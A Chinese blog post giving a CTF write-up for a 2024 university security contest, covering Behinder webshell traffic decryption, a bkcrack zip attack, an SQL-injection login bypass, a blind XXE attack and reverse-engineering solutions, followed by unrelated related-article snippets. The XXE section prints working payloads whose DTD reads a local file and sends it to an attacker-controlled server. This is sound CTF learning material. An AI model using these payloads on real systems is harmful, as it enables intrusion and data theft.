当前位置: 首页 > news >正文

【2024高校网络安全管理运维赛】巨细记录!

2024高校网络安全管理运维赛

文章目录

  • 2024高校网络安全管理运维赛
    • MISC
      • 签到
        • 考点:动态图片分帧提取
      • easyshell
        • 考点:流量分析 冰蝎3.0
    • Web
      • phpsql
        • 考点:sql万能钥匙
      • fileit
        • 考点:xml注入 外带
    • Crypto
      • secretbit
        • 考点:代码阅读理解 频率分析
    • RE
      • easyre
        • 考点:base64换表
      • babyre
        • 考点:UPX脱壳,Z3求解

MISC

签到

考点:动态图片分帧提取

没啥好说的,给了一个动态的flag 所以用在线或者StegServer工具都可以分帧提取

然后按照图片所述,上cyberchef rot13解密

easyshell

考点:流量分析 冰蝎3.0

image-20240507013000012

打开后过滤一下http

追踪http流

image-20240507013209117

先分析一下特征,发现是冰蝎3

判断条件:参考:https://blog.csdn.net/pingan233/article/details/129168134

  1. Accept字段

Accept: text/html,image/gif, image/jpeg, *; q=.2, */*; q=.2

image-20240508012853431

  1. UserAgent字段

(这个图是在网上搜的,版权原因师傅们可以自行搜索一下网上都有)外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

image-20240508012933665

  1. 长连接

image-20240508012820359

到此确定为冰蝎3

然后去翻到下面看返回的数据,需要对其发送请求的内容进行解密

冰蝎3主要就两层加密如下:

AES + BASE64解密

image-20240508011913273

https://blog.csdn.net/weixin_46081055/article/details/120007338

其中AES的密钥一般是默认的e45e329feb5d925b

iv全设置为0

去一点点追踪http流看看解密后内容

主要是看蓝色返回包内容

image-20240508013922309

从少的开始 从后往前

AES:

image-20240508013953551

image-20240508014017605

注意这段非常重要

继续往上

image-20240508014101935

检测到压缩包PK开头特征

image-20240508014138859

提取zip 直接按右边的保存即可提取成功

image-20240508014304108

image-20240508014255567

两个文件 secret1 和 secret2在一个压缩包里 但是都需要密码

在往上走

image-20240508014625586

其中对最后两个解密 第一个是secret2.txt

第二个是temp.zip

这和我们的提取出来的非常一致啊

就这几个信息 还能干嘛 回忆我们之前拿到一段奇怪的明文 推测这就是secret2.txt的内容 而我们的flag就是secret1的内容

那么这个压缩包已知其中一个文件内容,利用已知明文攻击,上工具bkcrack

首先构造一下文件目录 测试了

image-20240508022132817

image-20240508022144117

know.zip放的内容如上

构造命令:

bkcrack -C download.zip -c secret2.txt -P know.zip -p secret2.txt

其中-C表示密文(cipher),-p为明文(plaintext),明文和密文中明文的部分对应,这么说是因为上午试过了把secret.txt或者整个压缩包作为密文,然后都找不出key!

然后-C应该是指外层文件,-c应该是内层文件

image-20240508021720078

拿到key后的下一步 解到新的zip文件中 并自己设置密码为happysu

bkcrack -C download.zip -k <key> -U flag.zip happysu

image-20240508021830905

在flag.zip中拿下

image-20240508022004530

参考:https://blog.csdn.net/Rick66Ashley/article/details/130015948

Web

phpsql

考点:sql万能钥匙

开题是一个登录界面,起初的思路是sql注入,队友试了时间盲注和布尔盲注

但是很慢也报不出来,看着解数增长的这么快,我们感觉可能是思路错了,应该是想复杂了,那就试试万能钥匙吧


下面是解题思路

image-20240507201449367

首先随便测一个 可以去注册,既然出题人写了注册功能,肯定要给我们什么信息吧

image-20240507201611275

注册好后,登录,可以发现需要登录一个admin用户

结合题目描述 > 你能成为管理员吗 可以确定需要作为admin用户登录

先尝试一下对用户名采用万能钥匙

image-20240507201754014

败了

image-20240507201810272

那么 非常新颖的思路来了!确定用户名是admin 所以对密码进行万能钥匙!

不能有空格 故输入'||1#

登录成功,直接拿下:

image-20240507200606412不过关于这题还要补充一下:其实在真实场景中对密码进行这样的sql注入是不合理> 的,毕竟绝大多网站都会把密码转md5加密后存储

fileit

考点:xml注入 外带

首先开题,就一个非常直白的界面

Ctrl+U 看一下

image-20240507205841901

非常明显的提示,但是我不懂,搜一下

image-20240507205915139

不是很理解 呜呜 问一下gpt

simplexml_import_dom() 函数用于将 DOM(文档对象模型)节点转换为 SimpleXML(简单 XML)节点。DOM 是一种树状结构,表示 XML 文档的完整内容,而 SimpleXML 则是 PHP 中一种简单且易于使用的 XML 解析器,允许开发者使用面向对象的方式轻松地处理 XML 数据。

与 XXE(XML 外部实体注入)相关的内容是在处理 XML 数据时可能遇到的安全问题。XXE 攻击利用 XML 解析器的功能,通过向 XML 文档中插入恶意实体来获取敏感信息或执行远程代码。在 PHP 中,SimpleXML 解析器对外部实体默认是启用的,这意味着如果应用程序在处理用户提供的 XML 数据时不小心暴露了 XML 解析器,就有可能成为 XXE 攻击的目标。

此外其实看到这个函数 可以一眼定XML外部实体注入 且无回显,因为漏洞源码如下:

<?php
$xmlfile=file_get_contents('php://input');
$dom=new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
$xml=simplexml_import_dom($dom);
$xxe=$xml->xxe;
$str="$xxe \n";
?>

所以我们来尝试一下XML外部实体注入 界面没什么回显 就是XML外部实体注入 使用payload直接梭 注意把ip换成自己服务器的

发包内容:

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://192.168.134.128/eval.xml">
%remote;%payload;%send;
]>

自己的服务器上接收数据:

eval.xml

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///d:/flag.txt">
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://192.168.134.128/?content=%file;'>">

参考来源:http://tttang.com/archive/1716/#toc__6

image-20240508005934841

其实一开始可以先读个file:///etc/passwd 测试一下

那么接下来是对浏览器抓包 这里其实当时踩坑了 因为题目环境一开始不出网 所以根本没法打 后面重启了一下才可以

抓包后修改一下请求包类型

image-20240508010629602

起初content-Type是没有的

image-20240508010653148

改成这样

image-20240508011501716

个人踩坑:

image-20240508011330106

httpd 也就是nginx没启动 没设置开机自启

启动命令

systemctl status nginx   #状态
systemctl start nginx   #启动

image-20240508011538413

查看服务器访问日志

拿下:

image-20240508011617251

Crypto

secretbit

考点:代码阅读理解 频率分析

题目:

from secret import flag
from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdmdef instance(m, n):#随机性start = list(range(m))shuffle(start)for i in range(m):now = start[i]this_turn = Falsefor j in range(n-1):if now == i:this_turn = Truebreaknow = start[now]if not this_turn:return 0return 1def leak(m, n, times=2000):message = [instance(m, n) for _ in range(times)]return messageMAX_M = 400
MIN_M = 200
#把flag转成整形  然后再转为二进制
flag_b = [int(i) for i in bin(bytes_to_long(flag))[2:]]
leak_message = []for bi in tqdm(flag_b):#对每一个二进制位操作#生成合适的tmp_m0 n0 m1 n1while True:# m = 200 - 400# n = 100 - 356tmp_m0 = randrange(MIN_M, MAX_M)tmp_n0 = randrange(int(tmp_m0//2), int(tmp_m0 * 8 // 9))tmp_m1 = randrange(MIN_M, MAX_M)tmp_n1 = randrange(int(tmp_m1//2), int(tmp_m1 * 8 // 9))if abs(tmp_m0-tmp_m1-tmp_n0+tmp_n1) > MAX_M // 5:breakchoose_m = tmp_m0 if bi == 0 else tmp_m1choose_n = tmp_n0 if bi == 0 else tmp_n1leak_message.append([[tmp_m0, tmp_n0], [tmp_m1, tmp_n1], leak(choose_m, choose_n)])#需要做的是 每一个flag的bit位都会生成一组泄露数据
# 我们知道tmpm0和tmpn0 以及 tmpm1和tmpn1  需要通过leak的0 1值 去恢复 choose_m 和 choose_n
open('data.txt', 'w').write(str(leak_message))

解题:

其中注释都是自己加的,虽然一开题还是有点懵的,但是这个题作为我这种菜鸡密码人的唯一的倔强,ai那个根本看不懂,只能来好好分析一下咯

先写一点小demo进行测试一下instance函数在干什么

首先是对于shuffle

start = list(range(10))
print(start)
shuffle(start)  #直接打乱 不需要接收
print(start)

result:

[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
[2, 1, 4, 5, 3, 8, 0, 7, 6, 9]

这个对题目也没有什么影响,了解一下就好

下面是最关键的

我们知道tmpm0和tmpn0 以及 tmpm1和tmpn1 需要通过leak的0 1值 去恢复 choose_m 和 choose_n到底是等于哪个

所以我们把tmpm0和tmpn0 以及 tmpm1和tmpn1 都跑一遍这个leak函数 看看结果

image-20240507203253726

image-20240507203402406

两次结果来对比一下,哇靠,一模不一样啊 这打个集贸啊

思考思考,必须恢复,那我们要看看频率了 看看1和0的频率

针对0和1统计频率 你能想到什么!必然是求和!非常方便

image-20240507203840509

可以发现频率是比较稳定的

看看另一个

image-20240507204557127

其实差距还是蛮大的 所以说 判断的方法就是 两个都自己本地leak一次 得到频率 然后读取题目泄露的数据 得到真实的频率 两个自己生成的看看哪个接近 就能判断当前的bit位是谁啦

exp:

from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdmdef instance(m, n):#随机性start = list(range(m))shuffle(start)for i in range(m):now = start[i]this_turn = Falsefor j in range(n-1):if now == i:this_turn = Truebreaknow = start[now]if not this_turn:return 0return 1def leak(m, n, times=2000):message = [instance(m, n) for _ in range(times)]return messagewith open('data.txt', 'r') as file:# 读取文件中的数据data = file.read()# 将读取的字符串数据转换为列表  注意这是一个三元组
leak_message = eval(data)flag_b = []
#对flag的每一个bit泄露进行操作
for bit in leak_message:m0 = bit[0][0]n0 = bit[0][1]m1 = bit[1][0]n1 = bit[1][1]res = sum(bit[2])res0 = sum(leak(m0, n0))res1 = sum(leak(m1, n1))#如果0接近if abs(res0 - res) < abs(res1 - res):flag_b.append('0')else:flag_b.append('1')print(''.join(flag_b))print(''.join(flag_b))

10min左右

拿下:

a = 0b110011001101100011000010110011101111011011101000110100001101001011100110101111100110001011100110101111101110100011010000110010101011111011100110100010101100011011100100110010101110100010111110110011000110001011000010110011101111101
b = int(a)
print(long_to_bytes(b))
#b'flag{this_1s_the_sEcret_f1ag}'

RE

easyre

考点:base64换表

开题

shift+F12 打开字符串

image-20240507145900931

一眼定 base64换表

image-20240507145916678

babyre

考点:UPX脱壳,Z3求解

开题一看 这么几个函数,必定加壳了

image-20240507153828197

用exeinfo查一下

image-20240507161733279

发现是UPX壳 用给出的命令脱壳

image-20240507162112781

同样先shift+F12查看一下字符串

image-20240507162310905

找到非常吸睛的flag!

image-20240507163107106

显然有四个加密点,需要我们去恢复,只要恢复回来就会直接输出flag

注意我们的目的是让每个函数都返回0 避免跳转到LABEL_7

image-20240507164810346

Part1:

image-20240507163839155

第一部分的条件非常清晰

a1 - 0xADB1D018 == 0x36145344

Part2:

image-20240507164010530

(a1 | 0x8E03BEC3) - 3 * (a1 & 0x71FC413C) + a1 == 0x902C7FF8

Part3:

image-20240507164145790

a1 < 0x100000004 * ((~a1 & 0xA8453437) + 2 * ~(~a1 | 0xA8453437))+ -3 * (~a1 | 0xA8453437)+ 3 * ~(a1 | 0xA8453437)- (-10 * (a1 & 0xA8453437)+ (a1 ^ 0xA8453437)) == 551387557

Part4:

11 * ~(a1 ^ 0xE33B67BD)+ 4 * ~(~a1 | 0xE33B67BD)- (6 * (a1 & 0xE33B67BD)+ 12 * ~(a1 | 0xE33B67BD))+ 3 * (a1 & 0xD2C7FC0C)+ -5 * a1- 2 * ~(a1 | 0xD2C7FC0C)+ ~(a1 | 0x2D3803F3)+ 4 * (a1 & 0x2D3803F3)- -2 * (a1 | 0x2D3803F3) == 0xCE1066DC

注意上面的a1不一定是最终的a4 因为参数不一样


使用z3求解器

from z3 import *
s = Solver()
a4 = BitVec("a4", 32)
a1 = BitVec("a1", 32)
a2 = BitVec("a2", 32)
a3 = BitVec("a3", 32)
s.add( a1 - 0xADB1D018 == 0x36145344)
s.add( (a2 | 0x8E03BEC3) - 3 * (a2 & 0x71FC413C) + a2 == -1876131848 )
s.add( 4 * ((~a3 & 0xA8453437) + 2 * ~(~a3 | 0xA8453437)) + -3 * (~a3 | 0xA8453437) + 3 * ~(a3 | 0xA8453437) - (-10 * (a3 & 0xA8453437)  + (a3 ^ 0xA8453437)) == 551387557 )
s.add(11 * ~(a4 ^ 0xE33B67BD) + 4 * ~(~a4 | 0xE33B67BD) - (6 * (a4 & 0xE33B67BD) + 12 * ~(a4 | 0xE33B67BD)) + 3 * (a1 & 0xD2C7FC0C) + -5 * a1 - 2 * ~(a1 | 0xD2C7FC0C) + ~(a1 | 0x2D3803F3) + 4 * (a1 & 0x2D3803F3) - -2 * (a1 | 0x2D3803F3) == 0xCE1066DC)if s.check() == sat:print(s.model())
else:print("???? ERROR")

直接梭了

result:

[a3 = 78769651,a4 = 2341511158,a2 = 98124621,a1 = 3821413212]

image-20240507195227776

拿下:flag{e3c6235c-05d9434d-04b1edf3-8b909ff6}

相关文章:

【2024高校网络安全管理运维赛】巨细记录!

2024高校网络安全管理运维赛 文章目录 2024高校网络安全管理运维赛MISC签到考点&#xff1a;动态图片分帧提取 easyshell考点&#xff1a;流量分析 冰蝎3.0 Webphpsql考点&#xff1a;sql万能钥匙 fileit考点&#xff1a;xml注入 外带 Cryptosecretbit考点&#xff1a;代码阅读…...

Nuxt.js实战:Vue.js的服务器端渲染框架

创建Nuxt.js项目 首先&#xff0c;确保你已经安装了Node.js和yarn或npm。然后&#xff0c;通过命令行创建一个新的Nuxt.js项目&#xff1a; yarn create nuxt-app my-nuxt-project cd my-nuxt-project在创建过程中&#xff0c;你可以选择是否需要UI框架、预处理器等选项&…...

提高Rust安装与更新的速度

一、背景 因为rust安装过程中&#xff0c;默认的下载服务器为crates.io&#xff0c;这是一个国外的服务器&#xff0c;国内用户使用时&#xff0c;下载与更新的速度非常慢&#xff0c;因此&#xff0c;我们需要使用一个国内的服务器来提高下载与更新的速度。 本文推荐使用字节…...

【linux软件基础知识】内核代码中的就绪队列简化示例

在内核代码中,就绪队列通常使用允许高效插入和删除进程的数据结构来表示。 用于表示就绪队列的一种常见数据结构是链表。 以下是如何使用链表在内核代码中表示就绪队列的简化示例: struct task_struct {// Process control block (PCB) fields// ...struct task_struct *nex…...

《C++学习笔记---初阶篇6》---string类 上

目录 1. 为什么要学习string类 1.1 C语言中的字符串 2. 标准库中的string类 2.1 string类(了解) 2.2 string类的常用接口说明 2.2.1. string类对象的常见构造 2.2.2. string类对象的容量操作 2.2.3.再次探讨reserve与resize 2.2.4.string类对象的访问及遍历操作 2.2.5…...

mysql中的页和行

页 行即表中的真实行&#xff0c;‘行式数据库’的由来 虽然MySQL的数据文件&#xff08;例如.ibd文件&#xff09;中的数据页在物理上是通过链表连接的&#xff0c;但是在逻辑上&#xff0c;MySQL使用B树来组织和访问数据。 行&#xff1a;主要是dynamic类型...

Vim常用快捷键

这个是我的草稿本记录一下防止丢失&#xff0c;以后有时间进行整理 0 或功能键[Home]这是数字『 0 』&#xff1a;移动到这一行的最前面字符处 (常用)$ 或功能键[End]移动到这一行的最后面字符处(常用)G移动到这个档案的最后一行(常用)nGn 为数字。移动到这个档案的第 n 行。例…...

力扣题目汇总分析 利用树形DP解决问题

树里 任意两个节点之间的问题。而不是根节点到叶子节点的问题或者是父节点到子节点的问题。通通一个套路&#xff0c;即利用543的解题思路。 543.二叉树的直径 分析 明确&#xff1a;二叉树的 直径 是指树中任意两个节点之间最长路径的 长度。两个节点之间的最长路径是他们之…...

GO语言核心30讲 实战与应用 (第二部分)

原站地址&#xff1a;Go语言核心36讲_Golang_Go语言-极客时间 一、sync.WaitGroup和sync.Once 1. sync.WaitGroup 比通道更加适合实现一对多的 goroutine 协作流程。 2. WaitGroup类型有三个指针方法&#xff1a;Wait、Add和Done&#xff0c;以及内部有一个计数器。 (1) Wa…...

linux设置挂载指定的usb,自动挂载

一、设置指定的USB 在Linux系统中&#xff0c;如果您只想让系统挂载特定的USB设备&#xff0c;而忽略其他的USB设备&#xff0c;可以通过创建自定义的udev规则来实现。以下是设置系统只能挂载指定USB设备的基本步骤&#xff1a; 确定USB设备的属性&#xff1a; 首先&#xff0…...

简站WordPress主题

简站WordPress主题是一种专为建立网站而设计的WordPress模板&#xff0c;它旨在简化网站建设过程&#xff0c;使得用户能够更容易地创建和管理自己的网站。简站WordPress主题具有以下特点&#xff1a; 易用性&#xff1a;简站WordPress主题被设计为简单易用&#xff0c;适合各…...

is和==的关系

Python中is和的关系 is判断两个变量是不是指的是同一个内存地址&#xff0c;也就是通过id()函数判断 判断两个变量的值是不是相同 a [1, 2, 3, 4] b [1, 2, 3, 4] print(id(a)) # 2298268712768 print(id(b)) # 2298269716992 print(a is b) # False print(a b) # Tr…...

璩静是为了薅百度羊毛

关注卢松松&#xff0c;会经常给你分享一些我的经验和观点。 百度副总裁璩静离职了&#xff0c;网传她的年薪是1500万&#xff0c;而璩静在4月24日注册了一个文化传媒公司&#xff0c;大家都认为璩静是在为离职做准备。但松松我认为不是。 我认为&#xff1a;璩静成立新公司是…...

Element ui input 限制只能输入数字,且只能有两位小数

<el-form-item label"整体进度&#xff1a;" prop"number"> <el-input v-model"formInline.number" input"handleInput" placeholder"百分比" clearable></el-input>% </el-form-item&g…...

吃掉 N 个橘子的最少天数

代码实现&#xff1a; 方法一&#xff1a;递归——超时 #define min(a, b) ((a) > (b) ? (b) : (a))int minDays(int n) {if (n 1 || n 2) {return n;}if (n % 3 0) {if (n % 2 0) {return min(min(minDays(n - 1), minDays(n / 2)), minDays(n - 2 * (n / 3))) 1;} e…...

JavaScript 之 toString()方法详解

一、前言&#xff1a; ​ 在 JavaScript 中&#xff0c;toString() 方法是很多数据类型内置的方法&#xff0c;它被用于将特定的数据类型转换为字符串。但是在不同的数据类型中的作用并非完全相同&#xff0c;下面就来详细讲解一下 toString() 方法在各种数据类型中的使用和作用…...

PPMP_char3

PMPP char3 – Multidimensional grids and data ​ 五一过后&#xff0c;有些工作要赶&#xff0c;抽出时间更新一下。这一章基本都熟练掌握&#xff0c;在做习题过程中有一些思考。这里涉及到了一点点GEMM&#xff08;矩阵乘&#xff09;&#xff0c;GEMM有太多可深挖的了&a…...

VulkanSDK Demos vkcube 编译失败

操作系统: Windows 11 23H2 Vulkan 版本: 1.3.2.280.0 Visual Studio 版本: 2022 在VulkanSDK/Demos目录下存在一个demo solution,其中包含两个project, vkcube和vkcubepp,两个分别为C语言和C写的示例程序, 但是直接编译这两个project时会编译失败,报了以下错误: fatal err…...

(二)Jetpack Compose 布局模型

前文回顾 &#xff08;一&#xff09;Jetpack Compose 从入门到会写-CSDN博客 首先让我们回顾一下上一篇文章中里提到过几个问题&#xff1a; ComposeView的层级关系&#xff0c;互相嵌套存在的问题&#xff1f; 为什么Compose可以实现只测量一次&#xff1f; ComposeView和…...

【Oracle impdp导入dmp文件(windows)】

Oracle impdp导入dmp文件&#xff08;windows&#xff09; 1、连接数据库2、创建与导出的模式相同名称的用户WIRELESS2&#xff0c;并赋予权限3、创建directory 的物理目录f:\radio\dmp&#xff0c;并把.dmp文件放进去4、连接新用户WIRELESS25、创建表空间的物理目录F:\radio\t…...

代数结构:5、格与布尔代数

16.1 偏序与格 偏序集&#xff1a;设P是集合&#xff0c;P上的二元关系“≤”满足以下三个条件&#xff0c;则称“≤”是P上的偏序关系&#xff08;或部分序关系&#xff09; &#xff08;1&#xff09;自反性&#xff1a;a≤a&#xff0c;∀a∈P&#xff1b; &#xff08;2…...

如何使用DEEPL免费翻译PDF

如何使用DEEPL免费翻译PDF 安装DEEPL取消PDF限制 安装DEEPL 安装教程比较多&#xff0c;这里不重复。 把英文pdf拖进去&#xff0c;点翻译&#xff0c;在下面的框中有已经翻译完毕的文档。 但是存在两个问题 问题1&#xff1a;这些文档是加密的。 问题2&#xff1a;带有DeepL标…...

Spring-全面详解

Spring&#xff0c;就像是软件开发界的一个超级英雄&#xff0c;它让编写Java程序变得更简单、更灵活。想象一下&#xff0c;如果你要盖一栋大楼&#xff0c;Spring就是那个提供各种工具、框架和最佳实践的建筑大师&#xff0c;帮助你高效、优雅地搭建起整个项目。 Spring是啥&…...

QT自适应界面 处理高DPI 缩放比界面乱问题

1.pro文件添加 必须添加要不找不到 QT版本需要 5。4 以上才支持 QT widgets 2.main界面提前处理 // 1. 全局缩放使能QApplication::setAttribute(Qt::AA_EnableHighDpiScaling, true);// 2. 适配非整数倍缩放QGuiApplication::setHighDpiScaleFactorRoundingPolicy(Qt::High…...

序列到序列模型在语言识别Speech Applications中的应用 Transformer应用于TTS Transformer应用于ASR 端到端RNN

序列到序列模型在语言识别Speech Applications中的应用 A Comparative Study on Transformer vs RNN in Speech Applications 序列到序列(Seq2Seq)模型在语音识别(Speech Applications)中有重要的应用。虽然Seq2Seq模型最初是为了解决自然语言处理中的序列生成问题而设计的…...

【Linux】- Linux环境变量[8]

目录 环境变量 $符号 自行设置环境变量 环境变量 环境变量是操作系统&#xff08;Windows、Linux、Mac&#xff09;在运行的时候&#xff0c;记录的一些关键性信息&#xff0c;用以辅助系统运行。在Linux系统中执行&#xff1a;env命令即可查看当前系统中记录的环境变量。 …...

前端笔记-day04

文章目录 01-后代选择器02-子代选择器03-并集选择器04-交集选择器05-伪类选择器06-拓展-超链接伪类07-CSS特性-继承性08-CSS特性-层叠性09-CSS特性-优先级11-Emmet写法12-背景图13-背景图平铺方式14-背景图位置15-背景图缩放16-背景图固定17-background属性18-显示模式19-显示模…...

计算机字符集产生的历史与乱码

你好&#xff0c;我是 shengjk1&#xff0c;多年大厂经验&#xff0c;努力构建 通俗易懂的、好玩的编程语言教程。 欢迎关注&#xff01;你会有如下收益&#xff1a; 了解大厂经验拥有和大厂相匹配的技术等 希望看什么&#xff0c;评论或者私信告诉我&#xff01; 文章目录 一…...

Rerank进一步提升RAG效果

RAG & Rerank 目前大模型应用中&#xff0c;RAG&#xff08;Retrieval Augmented Generation&#xff0c;检索增强生成&#xff09;是一种在对话&#xff08;QA&#xff09;场景下最主要的应用形式&#xff0c;它主要解决大模型的知识存储和更新问题。 简述RAG without R…...

使用train.py----yolov7

准备工作 在训练之前&#xff0c;数据集的工作和配置环境的工作要做好 数据集&#xff1a;看这里划分数据集&#xff0c;训练自己的数据集。_划分数据集后如何训练-CSDN博客 划分数据集2&#xff0c;详细说明-CSDN博客 配置环境看这里 从0开始配置环境-yolov7_gpu0是inter g…...